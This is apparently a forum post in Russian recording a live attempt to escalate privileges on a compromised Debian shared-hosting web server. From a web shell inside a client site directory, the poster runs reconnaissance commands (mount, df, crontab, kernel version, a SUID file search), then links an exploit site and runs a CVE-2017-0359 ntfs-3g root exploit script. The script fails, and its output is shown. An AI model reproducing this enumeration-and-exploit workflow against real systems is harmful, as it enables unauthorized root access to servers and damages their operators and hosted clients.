tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
/dev/sdb1 on /var type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdc1 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web7/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
/dev/sdb1 on /var/www/clients/client2/web6/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web8/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
df -h
Код:
Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 3.0G 1.8G 1.1G 62% /
udev 10M 0 10M 0% /dev
tmpfs 403M 41M 362M 11% /run
tmpfs 1006M 0 1006M 0% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 1006M 0 1006M 0% /sys/fs/cgroup
/dev/sdb1 99G 40G 54G 43% /var
/dev/sdc1 99G 359M 93G 1% /backup
Код:
Code:
Debian GNU/Linux 8 \n \l
cat /etc/crontab
Код:
Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat /proc/version
Код:
Code:
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07)
cat /proc/sys/vm/mmap_min_addr
pwd
Код:
Code:
/var/www/clients/client2/web8/web/modules/crm
ls -la /usr/bin/staprun
Код:
Code:
ls: cannot access /usr/bin/staprun: No such file or directory
sh-4.3$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Код:
Code:
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 90456 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 23472 Apr 7 21:58 /usr/sbin/jk_chrootsh
-rwsr-xr-x 1 root root 13824 Apr 7 21:58 /usr/sbin/jk_procmailwrapper
-rwsr-xr-- 1 root www-data 18472 Feb 24 20:40 /usr/lib/apache2/suexec-pristine
-rwsr-xr-x 1 root root 10104 Mar 28 08:33 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 464904 Jul 22 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 39912 Feb 24 10:09 /usr/bin/newgrp
-rwsr-sr-x 1 root mail 89248 Feb 11 2015 /usr/bin/procmail
-rwsr-xr-x 1 root root 54192 Feb 24 10:09 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 75376 Feb 24 10:09 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44464 Feb 24 10:09 /usr/bin/chsh
-rwsr-xr-x 1 root root 53616 Feb 24 10:09 /usr/bin/chfn
-rwsr-xr-x 1 root root 157760 Jan 11 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 146160 Jan 28 12:16 /bin/ntfs-3g
-rwsr-xr-x 1 root root 30800 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40168 Feb 24 10:09 /bin/su
-rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount
-rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount
meow MEOW!
p.s.
/bin/ntfs-3g
Код:
Code:
ntfs-3g: No device is specified.
ntfs-3g 2014.2.15AR.2 integrated FUSE 28 - Third Generation NTFS Driver
Configuration type 7, XATTRS are on, POSIX ACLS are on
Copyright (C) 2005-2007 Yura Pakhuchiy
Copyright (C) 2006-2009 Szabolcs Szakacsits
Copyright (C) 2007-2014 Jean-Pierre Andre
Copyright (C) 2009 Erik Larsson
Usage: ntfs-3g [-o option[,...]]
Options: ro (read-only mount), windows_names, uid=, gid=,
umask=, fmask=, dmask=, streams_interface=.
Please see the details in the manual (type: man ntfs-3g).
Example: ntfs-3g /dev/sda1 /mnt/windows
News, support and information: http://tuxera.com
одняко -> http://0day.today/exploit/26893 ->
Код:
Code:
sh-4.3$ /bin/bash /tmp/1.sh
/bin/bash /tmp/1.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[*] Gathering environment info ...[*] Creating kernel hijack directories ...
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/lib': Permission denied
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/kernel': Permission denied[*] Forging symlinks ...
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/lib/modules\r/3.16.0-4-amd64\r\r': No such file or directory
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/kernel/fs\r/fuse\r': No such file or directory
ln: failed to create symbolic link 'fuse.ko\r': Permission denied[*] Pulling in deps ...[*] Building kernel module ...
/tmp/1.sh: line 25: $'\r': command not found
/tmp/1.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
: Permission denied cve_2017_0358.c
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?4070679){kind=avatar}
Линейный вид
